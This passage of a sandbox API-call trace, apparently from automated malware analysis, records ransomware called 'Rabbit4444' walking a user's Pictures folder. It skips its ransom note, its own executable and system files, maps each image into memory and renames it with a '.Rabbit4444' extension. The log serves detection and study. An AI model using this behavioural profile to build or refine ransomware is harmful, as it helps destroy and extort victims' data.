dwMaximumSizeLow=0xb460, lpName=0x0) returned 0x298 [0048.579] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb460) returned 0x70000 [0048.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.580] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13989118559) returned 1 [0048.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0048.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.581] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.581] CloseHandle (hObject=0x298) returned 1 [0048.581] CloseHandle (hObject=0x278) returned 1 [0048.583] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\0E0w6TbFOV.gif.Rabbit4444") returned 50 [0048.583] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\0E0w6TbFOV.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\0e0w6tbfov.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\0E0w6TbFOV.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\0e0w6tbfov.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.584] InterlockedExchangeAdd (in: Addend=0xff618, Value=45408 | out: Addend=0xff618) returned 17054768 [0048.584] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3366 [0048.584] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc87000, ftCreationTime.dwHighDateTime=0x1d4ce17, ftLastAccessTime.dwLowDateTime=0x93267390, ftLastAccessTime.dwHighDateTime=0x1d4c7d1, ftLastWriteTime.dwLowDateTime=0x93267390, ftLastWriteTime.dwHighDateTime=0x1d4c7d1, nFileSizeHigh=0x0, nFileSizeLow=0xf3ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0Y8YAfgHZ37VsZ3R.bmp", cAlternateFileName="0Y8YAF~1.BMP")) returned 1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2=".") returned 1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="..") returned 1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="windows") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="bootmgr") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="pagefile.sys") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="boot") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="ids.txt") returned -1 [0048.584] lstrcmpiW (lpString1="0Y8YAfgHZ37VsZ3R.bmp", lpString2="NTUSER.DAT") returned -1 [0048.584] lstrcpyW (in: lpString1=0x130eb6a, lpString2="0Y8YAfgHZ37VsZ3R.bmp" | out: lpString1="0Y8YAfgHZ37VsZ3R.bmp") returned="0Y8YAfgHZ37VsZ3R.bmp" [0048.584] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Y8YAfgHZ37VsZ3R.bmp", dwFileAttributes=0x0) returned 1 [0048.584] lstrlenW (lpString="0Y8YAfgHZ37VsZ3R.bmp") returned 20 [0048.584] lstrlenW (lpString="Rabbit4444") returned 10 [0048.584] lstrcmpiW (lpString1="7VsZ3R.bmp", lpString2="Rabbit4444") returned -1 [0048.584] lstrlenW (lpString=".dll") returned 4 [0048.584] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.584] lstrlenW (lpString=".lnk") returned 4 [0048.584] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.585] lstrlenW (lpString=".ini") returned 4 [0048.585] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.585] lstrlenW (lpString=".sys") returned 4 [0048.585] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Y8YAfgHZ37VsZ3R.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\0y8yafghz37vsz3r.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.585] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.585] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13989551300) returned 1 [0048.585] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=62381) returned 1 [0048.585] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0048.585] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0048.585] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf6b0, lpName=0x0) returned 0x298 [0048.585] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf6b0) returned 0x70000 [0048.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.587] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13989788311) returned 1 [0048.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0048.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0048.587] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.588] CloseHandle (hObject=0x298) returned 1 [0048.588] CloseHandle (hObject=0x278) returned 1 [0048.590] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\0Y8YAfgHZ37VsZ3R.bmp.Rabbit4444") returned 56 [0048.590] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\0Y8YAfgHZ37VsZ3R.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\0y8yafghz37vsz3r.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\0Y8YAfgHZ37VsZ3R.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\0y8yafghz37vsz3r.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.591] InterlockedExchangeAdd (in: Addend=0xff618, Value=62384 | out: Addend=0xff618) returned 17100176 [0048.591] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3368 [0048.591] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61e495d0, ftCreationTime.dwHighDateTime=0x1d4c9ae, ftLastAccessTime.dwLowDateTime=0x83271190, ftLastAccessTime.dwHighDateTime=0x1d4cd15, ftLastWriteTime.dwLowDateTime=0x83271190, ftLastWriteTime.dwHighDateTime=0x1d4cd15, nFileSizeHigh=0x0, nFileSizeLow=0x187f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1duD457p.jpg", cAlternateFileName="")) returned 1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2=".") returned 1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="..") returned 1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="windows") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="bootmgr") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="pagefile.sys") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="boot") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="ids.txt") returned -1 [0048.591] lstrcmpiW (lpString1="1duD457p.jpg", lpString2="NTUSER.DAT") returned -1 [0048.591] lstrcpyW (in: lpString1=0x130eb6a, lpString2="1duD457p.jpg" | out: lpString1="1duD457p.jpg") returned="1duD457p.jpg" [0048.591] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\1duD457p.jpg", dwFileAttributes=0x0) returned 1 [0048.591] lstrlenW (lpString="1duD457p.jpg") returned 12 [0048.592] lstrlenW (lpString="Rabbit4444") returned 10 [0048.592] lstrcmpiW (lpString1="uD457p.jpg", lpString2="Rabbit4444") returned 1 [0048.592] lstrlenW (lpString=".dll") returned 4 [0048.592] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.592] lstrlenW (lpString=".lnk") returned 4 [0048.592] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.592] lstrlenW (lpString=".ini") returned 4 [0048.592] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.592] lstrlenW (lpString=".sys") returned 4 [0048.592] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.592] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\1duD457p.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\1dud457p.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.593] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.593] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13990337112) returned 1 [0048.593] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=100342) returned 1 [0048.593] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0048.593] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0048.593] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18b00, lpName=0x0) returned 0x298 [0048.593] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18b00) returned 0x70000 [0048.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.596] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13990647994) returned 1 [0048.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0048.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0048.596] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.597] CloseHandle (hObject=0x298) returned 1 [0048.597] CloseHandle (hObject=0x278) returned 1 [0048.600] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\1duD457p.jpg.Rabbit4444") returned 48 [0048.600] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\1duD457p.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\1dud457p.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\1duD457p.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\1dud457p.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.600] InterlockedExchangeAdd (in: Addend=0xff618, Value=100352 | out: Addend=0xff618) returned 17162560 [0048.600] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3370 [0048.600] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x218dc3a0, ftCreationTime.dwHighDateTime=0x1d4c6eb, ftLastAccessTime.dwLowDateTime=0xbb844b30, ftLastAccessTime.dwHighDateTime=0x1d4cc01, ftLastWriteTime.dwLowDateTime=0xbb844b30, ftLastWriteTime.dwHighDateTime=0x1d4cc01, nFileSizeHigh=0x0, nFileSizeLow=0xd04a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1XaE_kKDx5.gif", cAlternateFileName="1XAE_K~1.GIF")) returned 1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="Rabbit4444.exe") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2=".") returned 1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="..") returned 1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="windows") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="bootmgr") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="pagefile.sys") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="boot") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="ids.txt") returned -1 [0048.600] lstrcmpiW (lpString1="1XaE_kKDx5.gif", lpString2="NTUSER.DAT") returned -1 [0048.600] lstrcpyW (in: lpString1=0x130eb6a, lpString2="1XaE_kKDx5.gif" | out: lpString1="1XaE_kKDx5.gif") returned="1XaE_kKDx5.gif" [0048.600] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\1XaE_kKDx5.gif", dwFileAttributes=0x0) returned 1 [0048.601] lstrlenW (lpString="1XaE_kKDx5.gif") returned 14 [0048.601] lstrlenW (lpString="Rabbit4444") returned 10 [0048.601] lstrcmpiW (lpString1="_kKDx5.gif", lpString2="Rabbit4444") returned -1 [0048.601] lstrlenW (lpString=".dll") returned 4 [0048.601] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.601] lstrlenW (lpString=".lnk") returned 4 [0048.601] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.601] lstrlenW (lpString=".ini") returned 4 [0048.601] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.601] lstrlenW (lpString=".sys") returned 4 [0048.601] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.601] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\1XaE_kKDx5.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\1xae_kkdx5.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.601] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13991190275) returned 1 [0048.601] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=53322) returned 1 [0048.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0048.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0048.601] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd350, lpName=0x0) returned 0x298 [0048.601] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd350) returned 0x70000 [0048.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.603] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13991404551) returned 1 [0048.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0048.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0048.603] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.604] CloseHandle (hObject=0x298) returned 1 [0048.604] CloseHandle (hObject=0x278) returned 1 [0048.608] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\1XaE_kKDx5.gif.Rabbit4444") returned 50 [0048.608] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\1XaE_kKDx5.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\1xae_kkdx5.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\1XaE_kKDx5.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\1xae_kkdx5.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.609] InterlockedExchangeAdd (in: Addend=0xff618, Value=53328 | out: Addend=0xff618) returned 17262912 [0048.609] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3373 [0048.609] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdea09c90, ftCreationTime.dwHighDateTime=0x1d4cf53, ftLastAccessTime.dwLowDateTime=0x36cb27c0, ftLastAccessTime.dwHighDateTime=0x1d4cd6d, ftLastWriteTime.dwLowDateTime=0x36cb27c0, ftLastWriteTime.dwHighDateTime=0x1d4cd6d, nFileSizeHigh=0x0, nFileSizeLow=0xb58d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4JN5OJk27EA8luclUdN4.jpg", cAlternateFileName="4JN5OJ~1.JPG")) returned 1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2=".") returned 1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="..") returned 1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="windows") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="bootmgr") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="pagefile.sys") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="boot") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="ids.txt") returned -1 [0048.609] lstrcmpiW (lpString1="4JN5OJk27EA8luclUdN4.jpg", lpString2="NTUSER.DAT") returned -1 [0048.609] lstrcpyW (in: lpString1=0x130eb6a, lpString2="4JN5OJk27EA8luclUdN4.jpg" | out: lpString1="4JN5OJk27EA8luclUdN4.jpg") returned="4JN5OJk27EA8luclUdN4.jpg" [0048.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\4JN5OJk27EA8luclUdN4.jpg", dwFileAttributes=0x0) returned 1 [0048.610] lstrlenW (lpString="4JN5OJk27EA8luclUdN4.jpg") returned 24 [0048.610] lstrlenW (lpString="Rabbit4444") returned 10 [0048.610] lstrcmpiW (lpString1="clUdN4.jpg", lpString2="Rabbit4444") returned -1 [0048.610] lstrlenW (lpString=".dll") returned 4 [0048.610] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.610] lstrlenW (lpString=".lnk") returned 4 [0048.610] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.610] lstrlenW (lpString=".ini") returned 4 [0048.610] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.610] lstrlenW (lpString=".sys") returned 4 [0048.610] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\4JN5OJk27EA8luclUdN4.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\4jn5ojk27ea8lucludn4.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.610] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.610] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13992076783) returned 1 [0048.610] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46477) returned 1 [0048.610] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0048.610] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0048.610] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb890, lpName=0x0) returned 0x298 [0048.610] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb890) returned 0x70000 [0048.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.612] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13992270842) returned 1 [0048.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0048.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0048.612] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.613] CloseHandle (hObject=0x298) returned 1 [0048.613] CloseHandle (hObject=0x278) returned 1 [0048.615] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\4JN5OJk27EA8luclUdN4.jpg.Rabbit4444") returned 60 [0048.615] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\4JN5OJk27EA8luclUdN4.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\4jn5ojk27ea8lucludn4.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\4JN5OJk27EA8luclUdN4.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\4jn5ojk27ea8lucludn4.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.615] InterlockedExchangeAdd (in: Addend=0xff618, Value=46480 | out: Addend=0xff618) returned 17316240 [0048.615] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3375 [0048.615] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, 